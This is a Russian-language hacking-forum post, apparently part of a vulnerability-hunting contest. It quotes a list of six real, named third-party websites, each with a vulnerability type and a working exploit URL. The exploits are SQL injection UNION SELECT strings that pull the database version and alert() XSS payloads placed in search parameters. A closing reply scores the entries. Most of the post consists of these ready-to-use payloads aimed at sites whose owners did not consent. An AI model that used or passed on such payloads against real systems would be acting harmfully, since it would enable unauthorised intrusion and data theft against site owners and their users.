29.06.2015, 14:03
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
С нами:
9721141
Репутация:
1013
|
|
Сообщение от semen6192
↑
1)Сайт:
http://www.felixfilm.se/film.php?id=77
Уязвимость: SQLi
Эксплойт:
http://www.felixfilm.se/film.php?id=...,6,7,8,9,10 --
2)Сайт:
http://prontowash.com/usa/location.php?id=2
Уязвимость: SQLi
Эксплойт:
http://prontowash.com/usa/location.php?id=-2 UNION SELECT 1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15--
3)Сайт:
http://www.comtecwash.com/photos.php?id=1
Уязвимость: SQLi
Эксплойт:
http://www.comtecwash.com/photos.php?id=-1
UNION SELECT 1,2,3,4,version(),6,7,8,9,10--
4)Сайт:
http://odessa-life.od.ua
Уязвимость: XSS
Эксплойт:
http://odessa-life.od.ua/gue/search
P.S В поиске: alert('1')
5)Сайт:
http://mapexpert.com.ua/index_ru.php?id=67&table=news
Уязвимость: SQLi
Эксплойт:
http://mapexpert.com.ua/index_ru.php...--+&table=news
P.S Там еще и XSS уязвимость есть: вместо 3,5 или 7 подставляем alert('antichat.ru')
6)Сайт:
http://prokudin-gorskiy.ru
Уязвимость: XSS
Эксплойт:
http://prokudin-gorskiy.ru/search.php?send=on&scope=1&key=alert('antichat.ru' )
SQL защитано, XSS нет, в конкурсе запрещены ru/ua
|
|
|